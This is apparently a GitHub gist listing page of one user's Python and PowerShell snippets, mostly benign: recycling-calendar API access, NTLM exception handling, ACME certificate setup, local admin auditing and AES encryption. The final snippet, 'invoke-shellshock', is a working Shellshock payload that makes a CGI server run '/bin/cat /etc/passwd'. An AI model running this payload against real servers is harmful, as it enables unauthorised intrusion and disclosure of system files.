This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
from datetime import datetime, date, timedelta | |
import re | |
CONF_CONSUMER = "recycleapp.be" | |
CONF_APPAPI="https://recycleapp.be/api/app/v1/" | |
# CONF_DAYSINFUTURE = 14 | |
CONF_DAYSINFUTURE = 31 | |
CONF_LANG='nl' | |
CONF_USERAGENT="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# used together with the Windows security policy "Network security: Restricit NTLM. | |
# if all NTLM is blocked, a computer becomes pretty useless, so this script to create exceptions based on failed connections from the NTLM log | |
# Adds exception to Network security: Restricit NTLM: Add remote server exceptions for NTLM authentication | |
function add-ntlmexception | |
{ | |
$event = Get-WinEvent -FilterHashTable @{LogName='Microsoft-Windows-NTLM/Operational'; ID = 4001} -maxevents 1 | |
$newexception = ((([xml]$event.toxml()).Event.EventData.Data) | ?{$_.name -eq "targetname"}).'#text' | |
$regpath = "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" | |
$regname = "clientallowedntlmservers" | |
$currentvalues = (Get-ItemProperty $regpath).$regname |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#import the ACMEsharp module - https://github.com/ebekker/ACMESharp | |
#more info: https://github.com/ebekker/ACMESharp/wiki/Quick-Start | |
import-module .\ACMESharp\ACMESharp.psd1 | |
#set global variables | |
$date = "$(get-date -format yyyy-MM-dd--HH-mm)" | |
$dnsname1 = "dns1-$date" | |
$dnsname2 = "dns2-$date" | |
#DirectAdmin and FTP credentials | |
$Username = "fancyusername" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Mendel's PowerShell profile | |
# https://gist.github.com/mendel129/33bc020d25efd813950eabc56be373a9 | |
set-alias -name npp 'C:\Program Files\Notepad++\notepad++.exe' | |
set-alias -name edit 'C:\Program Files\Notepad++\notepad++.exe' | |
set-alias -name notepad 'C:\Program Files\Notepad++\notepad++.exe' | |
set-alias -name wireshark "C:\Program Files\Wireshark\Wireshark.exe" | |
$profilepath = $env:USERPROFILE |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Microsoft LAPS, https://support.microsoft.com/en-us/kb/3062591, doesn't handle user creation that well, and GPP is deprecated since ms14-025 | |
#might get solved with startupscript (tested on win10) | |
#get users in local administrator | |
$obj_group = [ADSI]"WinNT://$($env:COMPUTERNAME)/Administrators,group" | |
$Administrators = @($obj_group.psbase.Invoke("Members")) | foreach{([ADSI]$_).InvokeGet("Name")} | |
#get local users | |
$adsi = [ADSI]"WinNT://$($env:COMPUTERNAME)" | |
$Users = $adsi.psbase.children | where {$_.psbase.schemaClassName -match "user"} | select @{n="Name";e={$_.name}} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#tSF for Cronos | |
#10 december 2014 | |
#11/12/2014:added tSF production api key | |
#api overview in doc on https://timesheetservicetest.cronos.be/ | |
#overview @ https://timesheettest.cronos.be | |
############################################################################ | |
[CmdletBinding()] | |
Param( | |
# [Parameter(Mandatory=$True)] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# get all mondays, wednesdays and fridays of december | |
[int]$Month = '12' | |
[int]$Year = '2015' | |
# days not worked in december | |
$exceptions = @(9,11,13) | |
$alldays = @() | |
0..31 | ForEach-Object -Process { | |
$evaldate = (Get-Date -Year $Year -Month $Month -Day 1).AddDays($_) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#PowerShell to create an gibberishaes(and openssl) compatible aes string with salt | |
#Salted__8bitsalt/aesstring | |
#thanks for .netcode -> http://stackoverflow.com/questions/5452422/openssl-using-only-net-classes | |
function OpenSSLEncrypt($passphrase, $plainText) | |
{ | |
# generate salt | |
[byte[]] $key | |
[byte[]] $iv; | |
[byte[]] $salt = RandomByteArray |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function play(){ | |
$var = getstate | |
if($var -eq "Paused") | |
{ | |
$play='<?xml version="1.0" encoding="utf-8"?> | |
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"> | |
<s:Body> | |
<u:Play xmlns:u="urn:av-openhome-org:service:Playlist:1" /> | |
</s:Body> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function invoke-shellshock($server) | |
{ | |
(invoke-webrequest -Uri "http://$server/cgi-bin/status" -Headers @{"custom"="() { ignored; };echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "} -Method post).rawcontent | |
#(invoke-webrequest -Uri "http://$server/cgi-bin/status" -Headers @{"custom"="() { ignored; };echo Content-Type: text/html; echo ; /bin/ls . "} -Method post).rawcontent | |
} |
NewerOlder